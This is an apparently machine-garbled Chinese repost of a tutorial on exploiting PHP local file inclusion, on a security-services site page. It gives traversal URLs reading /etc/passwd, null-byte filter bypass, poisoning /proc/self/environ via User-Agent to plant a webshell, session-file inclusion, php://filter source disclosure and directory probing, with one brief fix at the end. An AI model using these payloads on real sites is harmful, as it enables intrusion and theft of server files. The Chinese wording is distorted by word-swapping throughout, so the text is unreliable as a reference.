|
|
|
联系客服020-83701501

LFI Exploitation 技巧

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
LFI Exploitation 本领

LFI(Local File Include本地文件囊括裂痕) 繁冗举例

Default
1 <?php include($_GET['page']);?>

我们经由一一减少“../”的方式接见以下链接

Default
1 http://sitelambda.com/index.php?page=../../../../../../../../../../etc/passwd

就有大要失去/etc/passwd文件中内容

能够先经由?index.php?page=news.php?>>?index.php?page=./news.php来厥后实验是不是存在如许的裂痕

多数情况下,对这类裂痕的过滤方式以下

Default
1 <?php include($_GET['page'].”.php”);?>

这时我们即能够经由null字节来棍骗php说文件名曾经结束,从而绕过这类过滤

Default
1 http://sitelambda.com/index.php?page=../../../../../../../../../../etc/passwd%00

假设当初我们失去了一个LFI裂痕,理当怎么样垄断

能够试着失去以下紧要新闻

the access.log

无须说,接见日志很紧要,能够在?apache/httpd配置文件中检查接见日志的具体名字

/proc/self/environ

? ??这个文件个了解有一些能够管束的变量,比方说大要会有HTTP_USER_AGENT=Mozilla/5.0,如许我们能够经由设置HTTP_USER_AGENT为<?php phpinfo();?>,或是改成一句话,我们就能直接失去一个webshell

The?PHP Sessions Exploitation.

? ??囊括?sess_[your phpsessid value]这个文件,大要会在/tmp或是?/var/lib/php5/目次下

比如:

Default
1 index.php?p=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no七%00

The?upload

找到能上传工具的地方有什么劝化就不问可知了。

读取文件:

假设直接给出一个文件名的话,反馈给我们的文件内容会是实验完的代码,能够经由一下本领来失去base64编码后的文件

Default
1 index.php?page=php://filter/read=convert.base64-encode/resource=config

上述代码的遵命与?index.php?page=config同样,唯一区分便是base64编码了,然后不会被当成php文件实验了

(译者注:对于php://filter能够参考php支持的协定可封装协定http://www.php.net/manual/zh/wrappers.php)

 

特殊情况:

无意候即便我们能失去一个文件纷歧定是LFI裂痕。有大假设经由readfile()读取的文件,这时分就不会实验php代码了

不克不及实验php文件,会是一个缺憾

不过我们能够读取配置文件

index.php?page=./forum/config

 

果决文件夹可否存在:

我们能够经由以下代码来果决可否存在某个文件夹

Default
1 index.php?page=../../../../../../var/www/dossierexistant/../../../../../etc/passwd%00

 

避免体例:

能够经由动静囊括的方式来避免,代码举比方下

Default
1 if ($_GET['page'] == “news”) {include(“news.php”);} else {include (“accueil.php”);}

 

文章来历:http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/

 

日币处罚:

本文为译文且为原创、首发,属科普类,给予日币处罚共4枚。

 

AD:本站凋落投稿及积分(日币),日币可兑换实物处罚,每月top3可获得礼品一份。

内心请看:积分规定 及 日币超市

数安新闻+更多

证书相关+更多